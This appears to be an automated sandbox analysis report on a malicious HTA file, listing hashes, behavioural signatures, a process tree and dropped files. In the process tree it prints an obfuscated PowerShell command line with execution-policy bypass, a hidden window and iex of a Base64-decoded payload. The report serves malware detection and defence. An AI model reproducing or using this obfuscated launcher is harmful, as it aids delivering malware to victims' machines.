Analysis

max time kernel: 120s
max time network: 122s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 14-11-2024 02:28
Static task: static1

Behavioral task: behavioral1
  Sample: 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
  Resource: win10v2004-20241007-en
General

Target: 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
Size: 207KB
MD5: fcd22700962f05502dfd476b9fd35c11
SHA1: f338e2af10c4e6e35d7f8f6e3613516150aeea71
SHA256: 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
SHA512: 8a2ff6c978fcb10971638458887c0794d42ac8c3cd3ad5f56644dc639d4a8bfaf6bc1bb70c23006184ef285e545dbaa5b90621a6669dc58681af62a9b0a6dc19
SSDEEP: 96:43F97f45Ln2rlmc265Ln2glmccBaPrKwPjTQxZ5LnI5LnCiFlmcW65Ln2OQ:43F1f8wlz2yflzRgrsCiFlzWybQ
Malware Config
Signatures
Blocklisted process makes network request (2 IoCs)
Processes:
  flow  pid   Process
  4     1688  POwersHeLl.ExE
  5     1688  POwersHeLl.ExE

Evasion via Device Credential Deployment (2 IoCs)
Processes:
  pid   Process
  1688  POwersHeLl.ExE
  2804  powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  POwersHeLl.ExE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
Modifies Internet Explorer settings
Processes:
  description  ioc                                                                                                   Process
  Key created  \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid   Process
  1688  POwersHeLl.ExE
  2804  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description              pid   Process
  Token: SeDebugPrivilege  1688  POwersHeLl.ExE
  Token: SeDebugPrivilege  2804  powershell.exe

Suspicious use of WriteProcessMemory (16 IoCs)
Processes:
  description                        pid   Process         procid_target
  PID 2516 wrote to memory of 1688   2516  mshta.exe       30
  PID 2516 wrote to memory of 1688   2516  mshta.exe       30
  PID 2516 wrote to memory of 1688   2516  mshta.exe       30
  PID 2516 wrote to memory of 1688   2516  mshta.exe       30
  PID 1688 wrote to memory of 2804   1688  POwersHeLl.ExE  32
  PID 1688 wrote to memory of 2804   1688  POwersHeLl.ExE  32
  PID 1688 wrote to memory of 2804   1688  POwersHeLl.ExE  32
  PID 1688 wrote to memory of 2804   1688  POwersHeLl.ExE  32
  PID 1688 wrote to memory of 2872   1688  POwersHeLl.ExE  33
  PID 1688 wrote to memory of 2872   1688  POwersHeLl.ExE  33
  PID 1688 wrote to memory of 2872   1688  POwersHeLl.ExE  33
  PID 1688 wrote to memory of 2872   1688  POwersHeLl.ExE  33
  PID 2872 wrote to memory of 2860   2872  csc.exe         34
  PID 2872 wrote to memory of 2860   2872  csc.exe         34
  PID 2872 wrote to memory of 2860   2872  csc.exe         34
  PID 2872 wrote to memory of 2860   2872  csc.exe         34
Processes
(level 1) C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID: 2516

  (level 2) C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
    Command line: "C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'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'+[chaR]0X22+'))')))"
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1688

    (level 3) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2804

    (level 3) C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2872

      (level 4) C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp"
        - System Location Discovery: System Language Discovery
        PID: 2860
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 1KB
MD5: 78ba4ba9e5cd4d1450123b290bb33f7b
SHA1: a345efa2b3a9a661451bdcd73fa957216475a0d9
SHA256: a95e272886f38db936882deb9994674cc2a43a07d8a80bb92012fa916e36fd77
SHA512: 5741f1538d57a7399f053e387974fcbbfe4ce2f2854659dd9164cc610f07791678233c304751bb7bc3ffa46b1e4d607469e5943d837ddcac2a9b2f50dbf659e0

Filesize: 3KB
MD5: 3218f868f336ca301438aeb48e571988
SHA1: 55c770ae3601d5c090fef1d74f3bc8fade78d343
SHA256: 227bcaafdd1ee0187da1546b91d8fcfbd30ec783757c5121d98c2455e0001fcc
SHA512: 00155c6ba172374c16ca5d05b3e9b082c91f3a8f264bcef8b90c21f20a837caf77a545de4cd3605d723f8a647b901b0959818ce846eb4f64d587bce326b37d0c

Filesize: 7KB
MD5: 943f5fe78cba3be93ead28a8da5ba683
SHA1: a3cf7fe11d10fee595d7ebf1f5648ee18db07c7b
SHA256: b95ff72fb9f74ee921d909d6152b9b3cdce12b4d4b460c90af4ca7b644dbbaa9
SHA512: fc907e54b6c4ce0a25219fc29e6e3f8ce3c2a1ef119d646762523f591b1203a411ea2de46d9f00827169fe7a09fad176618831a9dc04fc8546fccdef84935a7f

File: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: 0e0ce348f6ba941e618f1f455f29bea6
SHA1: 9ba4c3c056c3e0c5997fd8eda7812d1b1a353324
SHA256: 06242b3b804c45f717ffc02587d79a5cb14a98cb8baa625601f31fdaab3c1b35
SHA512: 2af0e2e84d46fda69b4fb3bafebff13473f15199c943f1d93f9c08f901af18cb03f44e0f1f7b4f333d465e6e000b5fc4134d5a29e58fe671be5ad9451f4c27b0

Filesize: 652B
MD5: a39953edc790fd3c055982264d45ebd9
SHA1: 030b6c5c9f542e7a2c11e31e6f6cd192fe625d28
SHA256: 73e60fa13a32189fc6acb4f43438c43bea75ab6c954610c83a0e03adb8f5498b
SHA512: 21f55a0a46f8326aaba23334a6693dd0bea8547156fdab2b350958d670d00b47ab8a834f1beef1aece6b4eab761032efab633ded776481f038cb8cde29f9192d

Filesize: 473B
MD5: 4af98cbe7b888e1e92e1aa8a35732223
SHA1: 75d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256: 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA512: 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

Filesize: 309B
MD5: 39436a3ec2a28845767ca16383e33bd1
SHA1: 5003dd9e8157d5f18e1610fcfb89da7f0e5b6b27
SHA256: 805a6e724b1d941e225b313dfaec1a58cf13ede9db57896dc4acfefca1731992
SHA512: eff698496ff9504ddff80e7d87415ae24cf3d3888165f5bf01aa0390285db7f84450dd55a833d0ae04b3d686b04578eb340cd23da5e3931d297ddda775be7097